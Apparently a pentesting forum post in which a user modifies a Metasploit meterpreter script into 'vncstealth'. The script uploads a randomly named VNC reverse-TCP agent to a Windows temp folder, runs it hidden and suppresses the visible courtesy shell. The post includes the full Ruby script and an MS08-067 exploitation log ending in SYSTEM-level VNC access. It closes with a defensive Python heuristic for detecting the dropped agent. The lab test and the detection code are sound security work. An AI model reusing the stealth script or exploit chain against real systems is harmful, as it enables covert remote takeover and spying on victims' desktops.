I've been testing the new vnc meterpreter script hdm just wrote, as per:
Twitter / HD Moore: RunVNC: quickly spawn a V ...
It works just fine. However, it pops a courtesy shell, so I added:
Code:
set DisableCourtesyShell TRUE
just before executing the exploit. The parameter was properly echoed. But the courtesy shell keeps showing.
Has anyone else tried this?
Edit. Possibly this is because it's a meterpreter script, not a payload. Just wondering if there's a command available to disable it.
Edit 2.
Ok, guys, flooded by replies
Nevermind, I modified the original script vnc.rb as follows:
Code:
# $Id: vnc.rb 7872 2009-12-15 05:10:33Z hdm $
#
# Meterpreter script for obtaining a quick VNC session
#

session = client

#
# Options
#
opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "This help menu"],
  "-r" => [ true,  "The IP of the system running Metasploit listening for the connect back"],
  "-p" => [ true,  "The port on the remote host where Metasploit is listening (default: 4545)"],
  "-D" => [ false, "Disable the automatic multi/handler (use with -r to accept on another system)"]
)

#
# Default parameters
#
rhost    = Rex::Socket.source_address("1.2.3.4")
rport    = 4545
autoconn = true

#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
  case opt
  when "-h"
    print_line(opts.usage)
    return
  when "-r"
    rhost = val
  when "-p"
    rport = val.to_i
  when "-D"
    autoconn = false
  end
end

#
# Create the agent EXE
#
print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport}")
pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw = pay.generate
exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
print_status("VNC stager executable #{exe.length} bytes long")

#
# Upload to the filesystem
#
tempdir = client.fs.file.expand_path("%TEMP%")
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tempexe.gsub!("\\\\", "\\")
fd = client.fs.file.new(tempexe, "wb")
fd.write(exe)
fd.close
print_status("Uploaded the VNC agent to #{tempexe} (must be deleted manually)")

#
# Setup the multi/handler if requested
#
if(autoconn)
  mul = client.framework.exploits.create("multi/handler")
  mul.datastore['PAYLOAD']  = "windows/vncinject/reverse_tcp"
  mul.datastore['LHOST']    = rhost
  mul.datastore['LPORT']    = rport
  mul.datastore['EXITFUNC'] = 'process'
  mul.datastore['ExitOnSession'] = true
  # The vncinject payload is launched by this handler, not by the original
  # exploit, so the option has to be set in the handler's datastore.
  mul.datastore['DisableCourtesyShell'] = true
  mul.exploit_simple(
    'Payload'  => mul.datastore['PAYLOAD'],
    'RunAsJob' => true
  )
end

#
# Execute the agent
#
print_status("Executing the VNC agent with endpoint #{rhost}:#{rport}...")
proc = session.sys.process.execute(tempexe, nil, {'Hidden' => true})
Then, saved as:
Code:
/pentest/exploits/framework3/scripts/meterpreter/vncstealth.rb
And tested it:
Code:
=[ metasploit v3.3.3-dev [core:3.3 api:1.0]
+ -- --=[ 476 exploits - 220 auxiliary
+ -- --=[ 262 payloads - 22 encoders - 8 nops
=[ svn r7893 updated today (2009.12.16)
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.6
LHOST => 192.168.1.6
msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.2:1035)
meterpreter > run vncstealth
[*] Creating a VNC stager: LHOST=192.168.1.6 LPORT=4545)
[*] VNC stager executable 87552 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\udoGvQNkBM.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.6:4545...
[*] VNC Server session 2 opened (192.168.1.6:4545 -> 192.168.1.2:1036)
meterpreter > Connected to RFB server, using protocol version 3.3
No authentication needed
Desktop name "VNCShell [SYSTEM@LAB-VICTIM] - Full Access"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
It's bloody silent now. No pop-up courtesy shell.
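For the blue-team side of this thread, here is a detection heuristic (an added example, not part of the post or of Metasploit) that matches the host artifacts the script above leaves behind: a 6-13 letter random-named .exe dropped in %TEMP%, run hidden, and connecting back to the handler port (4545 by default). The Sysmon-style event dicts are constructed, and the field names (EventID, Image, DestinationIp, DestinationPort) are an assumption about the log format.

```python
import re
from pathlib import PureWindowsPath
from typing import Optional

# vncstealth.rb names the dropped agent rand_text_alpha(rand(8)+6) + ".exe":
# 6 to 13 ASCII letters, written to %TEMP% and left there after the session.
RANDOM_EXE = re.compile(r"^[A-Za-z]{6,13}\.exe$")
TEMP_DIRS = ("\\windows\\temp", "\\local\\temp", "\\temp")
HANDLER_PORT = 4545  # the script's default LPORT; adjust to the handler port in use

def is_temp_path(path: str) -> bool:
    """True when the file sits directly inside a Windows temp directory."""
    parent = str(PureWindowsPath(path).parent).lower()
    return parent.endswith(TEMP_DIRS)

def flag_process_event(ev: dict) -> Optional[str]:
    """Process creation (Sysmon-style EventID 1): random-named exe run from temp."""
    image = ev.get("Image", "")
    if RANDOM_EXE.match(PureWindowsPath(image).name) and is_temp_path(image):
        return f"random-named exe launched from temp dir: {image}"
    return None

def flag_network_event(ev: dict, port: int = HANDLER_PORT) -> Optional[str]:
    """Network connection (EventID 3): temp-dir exe calling back to the handler port."""
    image = ev.get("Image", "")
    if ev.get("DestinationPort") == port and is_temp_path(image):
        return f"temp-dir exe connecting out to {ev.get('DestinationIp')}:{port}: {image}"
    return None

def scan(events: list) -> list:
    """Run both checks over a list of event dicts; returns the reasons that fired."""
    hits = []
    for ev in events:
        reason = flag_process_event(ev) if ev.get("EventID") == 1 else flag_network_event(ev)
        if reason:
            hits.append(reason)
    return hits

# Constructed sample events modelled on the session log in the post (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\WINDOWS\TEMP\udoGvQNkBM.exe"},
    {"EventID": 1, "Image": r"C:\Program Files\TightVNC\vncviewer.exe"},
    {"EventID": 3, "Image": r"C:\WINDOWS\TEMP\udoGvQNkBM.exe",
     "DestinationIp": "192.168.1.6", "DestinationPort": 4545},
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print("[!]", hit)
```

Both checks fire on the constructed events for the dropped agent and stay quiet for the legitimate VNC viewer and browser, so this is a starting point for a Sysmon or EDR rule rather than a finished one.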